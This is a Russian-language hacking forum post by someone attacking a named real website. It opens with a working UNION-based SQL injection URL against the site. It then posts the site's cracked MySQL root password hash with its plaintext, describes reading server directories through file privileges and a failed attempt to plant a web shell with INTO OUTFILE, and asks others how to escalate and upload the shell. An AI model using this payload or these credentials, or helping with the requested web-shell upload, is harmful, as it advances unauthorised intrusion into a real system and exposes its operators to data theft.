http://www.sngboard.ru/index.php?id_categ=-99999+union+select+1,2,3,4,5,6,table_name,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+ from+information_schema.tables/*

Значит ситуация такая - есть куча табл с юзерами но доступ к ним и некоторым полям их запрещен, конструкции unhex(hex()), aes_de... не помогают. Зато есть доступ к mysql.user оттудова я стянул и сбрутил пасс рута.

ROOT:*85FD004275C6D61CD6CAD3DEC994E8E326F5AEF2(nclmswpq)

Включен file_priv, можно читать диры сайта.
/home/www/htdocs/SNGBOARD/admin - нельзя прочитать
/home/www/phpmyadmin - нельзя прочитать
Пробовал залить шелл через into outfile в диру /home/www/htdocs/sngboard так как кавычки фильтруются юзал подзапросы но тоже безрезультатно

собсно вопросы:
- что можно сделать с рутом от мускуля?
- что можно найти интересного в дирах?
- и какже всетаки залить шелл?